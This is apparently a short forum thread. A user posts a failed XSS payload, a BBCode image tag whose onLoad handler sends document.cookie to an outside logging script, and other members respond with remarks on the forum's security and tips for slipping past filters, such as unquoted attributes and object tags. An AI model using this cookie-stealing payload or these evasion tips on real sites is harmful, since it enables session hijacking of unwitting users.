bah didn't work

[image=http://www.mylink/THO.jpg" name="hia" onLoad="hia.src='http://m-net.arbornet.org/~andiroo/logreport.php?logreport=damnm' + document.cookie";]

http://m-net.arbornet.org/~andiroo/logreport.php?logreport=damnm' + document.cookie";

Would you mind telling us why you want our cookie?
Anyways you wouldn't go so far if you receive outdated phpsessid's.

phiber was one of the guys who tried stuff like that some time ago (it was you or?) and he found some not so nice stuff. but we fixed it and it should not be possible to do any harm here. but try it and if you find smething tell us

1. You can try to do xss, but at least do not try to steal cookies (in case the xss works lol)
2. Yes, I was that one (remember "you are an idiot hahahaha"? )

one of the biggest problems is that browser even read stuff that should not be read because it is wrong and helps to exploit:

-you can input things without quotes and the browser that shows the page knows what to do
-check the object tag!
-if you only filter ' and " you have a problem because it also works without

Yeah lol. It was semiworking lol. I got it to goto the site. But the javascript wasn't working it wouldn't give me the damn cookie lol. Yup i was checking for a nice XXS. Didn't work tho. Nice job on getting the forum secure. Humm you guys are very err... dunno what the word is but checking the url of the image lol.

Yeah ok sorry about the attempted cookie stealing. It was a new technque that i learned. And i just wanted to check it out. The thing that annoys me is that i seen this site where i was making popup messages come up on the homepage. I could have done all sorts of things if i knew more.